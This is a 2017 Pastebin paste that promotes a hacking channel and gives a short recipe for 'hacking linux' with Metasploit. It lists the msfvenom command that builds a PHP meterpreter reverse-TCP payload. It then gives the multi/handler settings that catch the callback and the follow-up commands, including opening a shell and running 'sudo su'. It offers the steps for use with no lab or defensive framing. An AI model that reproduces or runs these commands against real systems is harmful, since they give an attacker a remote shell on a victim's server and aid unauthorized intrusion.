Professional-hacker

hacking linux with php payload Using metasploit

Feb 8th, 2017
321
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.19 KB | None | 0 0
  1. ##################################################JokerSecurity########################################################
  2. # Title : hacking linux with php payload Using metasploit
  3. # Tested On : [ Kali-Linux ]
  4. # MyChannel Youtube : https://www.youtube.com/channel/UCPRRAzu8dMWxChn-RruC-eg/videos
  5. # Myblog : http://kader-information.blogspot.com/
  6. # Link video : https://www.youtube.com/watch?v=BzJyaKui8FA&feature=youtu.be
  7. ######################
  8. # [+] COMMENDS :
  9. ######################
  10. create payload
  11. ============
  12. msfvenom -p php/meterpreter/reverse_tcp LHOST=(your-ip) LPORT=4444 R > /root/Desktop/jok.php
  13.  
  14. metasploit commends :
  15. ====================
  16. use exploit/multi/handler
  17. set payload php/meterpreter/reverse_tcp
  18. set LHOST (your-ip)
  19. set LPORT 4444
  20. exploit
  21. help
  22. sysinfo
  23. shell
  24. sudo su
  25. ls
  26. ifconfig
  27.  
  28.  
  29. subscribe for my channel and page in facebook
  30.  
  31. # My Blogger : http://kader-information.blogspot.com/
  32.  
  33. # Page FacebOOk1 : https://www.facebook.com/AnonymousPalestine.vip
  34.  
  35. # Page Facebook2 : https://www.facebook.com/Professional.hacker.25/
  36.  
  37. By <3
  38.  
  39. ##################################################JokerSecurity###############################################################
Add Comment
Please, Sign In to add comment